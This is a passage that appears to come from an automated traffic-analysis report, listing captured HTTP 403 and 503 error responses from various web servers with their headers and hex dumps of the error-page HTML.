72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:53:54 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:54 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wqfkv3iNGX9HclIuOZ1%2B7rc9B1vYAbGaH8DL%2B8c%2FKl0RfFOn2C6WLD1i7wImktCy0GZ7eWojnilPtfnDdwQFjcXZRbDXj0G5LecNUKMBcz16d6JtTmjDsqYf%2BVQ2qY4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e60de5b5c20-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:54 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Thu, 27 Jul 2023 19:53:54 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: ZeUkE5Kp/5oAz8q68Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 27 Jul 2023 19:53:54 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:55 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:55 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 12 Aug 2021 07:53:38 GMTAccept-Ranges: bytesContent-Length: 15513Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=100Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 50 6c 61 63 65 20 66 61 76 69 63 6f 6e 2e 69 63 6f 20 61 6e 64 20 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 62 61 73 65 20 63 73 73 20 73 74 79 6c 65 73 2d 2d 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 20 20 20 2e 70 69 63 6e 6f 74 65 20 7b 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 20 7d 0a 09 09 20 20 20 2e 61 72 72 6f 77 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 65 6d 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 34 65 6d 3b 7d 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 70 61 67 65 20 2e 6c 6f 67 69 6e 2d 77 72 61 70 70 65 72 20 66 6f 72 6d 20 7b 20 77 69 64 74 68 3a 20 37 39 30 70 78 3b 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 32 30 70 78 20 32 30 70 78 20 32 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 7d 0a 20 0a 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 74 65 78 74 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 30 70 78 20 7d 0a 09 09 20 20 20 2e 73 74 61 74 65 69 63 6f 6e 20 7b 20
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Hm0fVshjr3DCD27Bdhton4EcOkBakhhcCDQ8j4nu6Eu9YltNkezMXZ3iTr3yXLNSP3Vt8ze5IrVEbsiNZRrIM3e1BuzwyauqtV7m2VlqY3oVSiGe%2F%2FOvenRAmqxs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76e692b2e1d92-FRAalt-svc: h3=":443"; ma=86400Data Raw: 32 62 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f Data Ascii: 2bb<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 st
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:53:55 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Thu, 27 Jul 2023 19:53:55 GMTContent-Type: text/htmlContent-Length: 918Connection: keep-aliveLast-Modified: Mon, 27 Jan 2020 20:24:24 GMTETag: "396-59d24e4b2e24e"Accept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 35 30 33 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 68 32 3e 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 62 6c 65 20 74 6f 20 73 65 72 76 69 63 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 64 75 65 20 74 6f 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 64 6f 77 6e 74 69 6d 65 20 6f 72 20 63 61 70 61 63 69 74 79 20 70 72 6f 62 6c 65 6d 73 2e 20 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 2f 3e 0a 20 20 20 20 3c 70 3e 54 68 61 74 27 73 20 77 68 61 74 20 79 